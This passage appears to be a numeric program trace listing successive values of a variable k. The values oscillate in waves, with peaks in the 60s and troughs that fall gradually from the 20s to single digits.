47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 26\nk = 25\nk = 
25\nk = 25\nk = 25\nk = 24\nk = 24\nk = 24\nk = 24\nk = 24\nk = 25\nk = 25\nk = 25\nk = 25\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 66\nk = 67\nk = 68\nk = 67\nk = 66\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 25\nk = 25\nk = 25\nk = 25\nk = 24\nk = 24\nk = 24\nk = 24\nk = 23\nk = 23\nk = 23\nk = 23\nk = 23\nk = 24\nk = 24\nk = 24\nk = 24\nk = 25\nk = 25\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 25\nk = 
25\nk = 24\nk = 24\nk = 24\nk = 24\nk = 23\nk = 23\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 22\nk = 22\nk = 23\nk = 23\nk = 23\nk = 23\nk = 24\nk = 24\nk = 25\nk = 25\nk = 26\nk = 26\nk = 27\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 27\nk = 26\nk = 26\nk = 25\nk = 25\nk = 24\nk = 24\nk = 23\nk = 23\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 21\nk = 21\nk = 22\nk = 22\nk = 22\nk = 22\nk = 23\nk = 23\nk = 24\nk = 24\nk = 25\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 65\nk = 66\nk = 67\nk = 66\nk = 65\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 
26\nk = 25\nk = 25\nk = 24\nk = 24\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 21\nk = 20\nk = 20\nk = 20\nk = 20\nk = 20\nk = 21\nk = 21\nk = 21\nk = 22\nk = 22\nk = 22\nk = 23\nk = 23\nk = 24\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 24\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 20\nk = 20\nk = 20\nk = 20\nk = 19\nk = 19\nk = 19\nk = 19\nk = 19\nk = 20\nk = 20\nk = 20\nk = 21\nk = 21\nk = 21\nk = 22\nk = 22\nk = 23\nk = 24\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 29\nk = 
28\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 24\nk = 23\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 20\nk = 20\nk = 20\nk = 19\nk = 19\nk = 19\nk = 19\nk = 18\nk = 18\nk = 18\nk = 18\nk = 18\nk = 19\nk = 19\nk = 19\nk = 20\nk = 20\nk = 21\nk = 21\nk = 22\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 25\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 66\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 25\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 22\nk = 21\nk = 21\nk = 20\nk = 20\nk = 19\nk = 19\nk = 19\nk = 18\nk = 18\nk = 18\nk = 18\nk = 17\nk = 17\nk = 17\nk = 17\nk = 17\nk = 18\nk = 18\nk = 18\nk = 19\nk = 19\nk = 20\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 
32\nk = 31\nk = 30\nk = 29\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 20\nk = 19\nk = 19\nk = 18\nk = 18\nk = 18\nk = 17\nk = 17\nk = 17\nk = 17\nk = 16\nk = 16\nk = 16\nk = 16\nk = 17\nk = 17\nk = 17\nk = 17\nk = 18\nk = 18\nk = 19\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 19\nk = 18\nk = 18\nk = 17\nk = 17\nk = 17\nk = 17\nk = 16\nk = 16\nk = 16\nk = 15\nk = 15\nk = 15\nk = 15\nk = 16\nk = 16\nk = 16\nk = 17\nk = 17\nk = 18\nk = 18\nk = 19\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 
36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 19\nk = 18\nk = 18\nk = 17\nk = 17\nk = 16\nk = 16\nk = 16\nk = 15\nk = 15\nk = 15\nk = 14\nk = 14\nk = 14\nk = 14\nk = 15\nk = 15\nk = 15\nk = 16\nk = 16\nk = 17\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 24\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 24\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 17\nk = 16\nk = 16\nk = 15\nk = 15\nk = 15\nk = 14\nk = 14\nk = 14\nk = 13\nk = 13\nk = 13\nk = 13\nk = 14\nk = 14\nk = 14\nk = 15\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 
41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 15\nk = 14\nk = 14\nk = 14\nk = 13\nk = 13\nk = 13\nk = 12\nk = 12\nk = 12\nk = 12\nk = 13\nk = 13\nk = 13\nk = 14\nk = 14\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 14\nk = 14\nk = 13\nk = 13\nk = 13\nk = 12\nk = 12\nk = 12\nk = 11\nk = 11\nk = 11\nk = 11\nk = 12\nk = 12\nk = 13\nk = 13\nk = 14\nk = 14\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 19\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 
46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 19\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 14\nk = 14\nk = 13\nk = 13\nk = 12\nk = 12\nk = 11\nk = 11\nk = 11\nk = 10\nk = 10\nk = 10\nk = 10\nk = 11\nk = 11\nk = 12\nk = 12\nk = 13\nk = 13\nk = 14\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 14\nk = 13\nk = 13\nk = 12\nk = 12\nk = 11\nk = 11\nk = 10\nk = 10\nk = 10\nk = 9\nk = 9\nk = 9\nk = 10\nk = 10\nk = 10\nk = 11\nk = 11\nk = 12\nk = 13\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 
52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 13\nk = 12\nk = 11\nk = 11\nk = 10\nk = 10\nk = 10\nk = 9\nk = 9\nk = 8\nk = 8\nk = 8\nk = 9\nk = 9\nk = 9\nk = 10\nk = 11\nk = 11\nk = 12\nk = 13\nk = 14\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 14\nk = 13\nk = 12\nk = 11\nk = 11\nk = 10\nk = 9\nk = 9\nk = 9\nk = 8\nk = 8\nk = 7\nk = 7\nk = 7\nk = 8\nk = 8\nk = 9\nk = 9\nk = 10\nk = 11\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 
55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 11\nk = 10\nk = 9\nk = 9\nk = 8\nk = 8\nk = 7\nk = 7\nk = 6\nk = 6\nk = 6\nk = 7\nk = 7\nk = 8\nk = 9\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 